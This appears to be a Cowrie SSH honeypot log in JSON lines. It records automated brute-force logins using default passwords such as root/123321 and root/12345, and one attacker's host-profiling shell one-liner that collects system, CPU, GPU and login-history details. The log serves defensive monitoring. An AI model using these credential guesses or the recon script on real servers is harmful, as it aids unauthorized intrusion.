{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:31.463517Z","src_ip":"212.227.125.160","session":"f439251da646"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:31.675571Z","src_ip":"212.227.125.160","session":"f439251da646"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:32.187535Z","src_ip":"212.227.125.160","session":"f439251da646"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:54:32.188323Z","src_ip":"212.227.125.160","session":"f439251da646"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:32.297188Z","src_ip":"212.227.125.160","session":"f439251da646"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:32.298441Z","src_ip":"212.227.125.160","session":"f439251da646"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52878,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a2423402f3e","protocol":"ssh","message":"New connection: 212.227.125.160:52878 (1.2.3.4:22) [session: 3a2423402f3e]","sensor":"my-vps","timestamp":"2025-08-26T11:54:37.170771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:37.172041Z","src_ip":"212.227.125.160","session":"3a2423402f3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:37.230235Z","src_ip":"212.227.125.160","session":"3a2423402f3e"}
{"eventid":"cowrie.login.failed","username":"root2","password":"root2","message":"login attempt [root2/root2] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:37.404271Z","src_ip":"212.227.125.160","session":"3a2423402f3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52892,"dst_ip":"1.2.3.4","dst_port":22,"session":"256dbfca5a7b","protocol":"ssh","message":"New connection: 212.227.235.229:52892 (1.2.3.4:22) [session: 256dbfca5a7b]","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.411411Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.529346Z","src_ip":"212.227.125.160","session":"3a2423402f3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58584,"dst_ip":"1.2.3.4","dst_port":22,"session":"f79e9e8d1958","protocol":"ssh","message":"New connection: 212.227.235.229:58584 (1.2.3.4:22) [session: f79e9e8d1958]","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.570127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.892288Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.893010Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.987072Z","src_ip":"212.227.235.229","session":"256dbfca5a7b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:38.987728Z","src_ip":"212.227.235.229","session":"256dbfca5a7b"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.322371Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:41.867579Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.868260Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.868993Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.870006Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.871379Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.872228Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.872955Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.873889Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.874776Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.875542Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.876015Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.876559Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:41.877037Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:54:42.317328Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:42.318166Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:42.319086Z","src_ip":"212.227.235.229","session":"f79e9e8d1958"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53648,"dst_ip":"1.2.3.4","dst_port":22,"session":"b04bf43f97e0","protocol":"ssh","message":"New connection: 212.227.125.160:53648 (1.2.3.4:22) [session: b04bf43f97e0]","sensor":"my-vps","timestamp":"2025-08-26T11:54:43.158405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:43.159309Z","src_ip":"212.227.125.160","session":"b04bf43f97e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:43.212681Z","src_ip":"212.227.125.160","session":"b04bf43f97e0"}
{"eventid":"cowrie.login.failed","username":"odoo18","password":"odoo18","message":"login attempt [odoo18/odoo18] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:43.664756Z","src_ip":"212.227.125.160","session":"b04bf43f97e0"}
{"eventid":"cowrie.login.success","username":"root","password":"123@qwe","message":"login attempt [root/123@qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:43.800089Z","src_ip":"212.227.235.229","session":"256dbfca5a7b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:44.734272Z","src_ip":"212.227.125.160","session":"b04bf43f97e0"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:44.875655Z","src_ip":"212.227.235.229","session":"256dbfca5a7b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41916,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfd08572c06c","protocol":"ssh","message":"New connection: 83.168.105.65:41916 (1.2.3.4:22) [session: dfd08572c06c]","sensor":"my-vps","timestamp":"2025-08-26T11:54:45.612198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:45.613124Z","src_ip":"83.168.105.65","session":"dfd08572c06c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:45.650308Z","src_ip":"83.168.105.65","session":"dfd08572c06c"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:45.764580Z","src_ip":"83.168.105.65","session":"dfd08572c06c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:46.803656Z","src_ip":"83.168.105.65","session":"dfd08572c06c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54422,"dst_ip":"1.2.3.4","dst_port":22,"session":"3abc43dc301e","protocol":"ssh","message":"New connection: 212.227.125.160:54422 (1.2.3.4:22) [session: 3abc43dc301e]","sensor":"my-vps","timestamp":"2025-08-26T11:54:49.078336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:49.079648Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:49.463772Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47456,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac8013e467d9","protocol":"ssh","message":"New connection: 212.227.125.160:47456 (1.2.3.4:22) [session: ac8013e467d9]","sensor":"my-vps","timestamp":"2025-08-26T11:54:50.059447Z"}
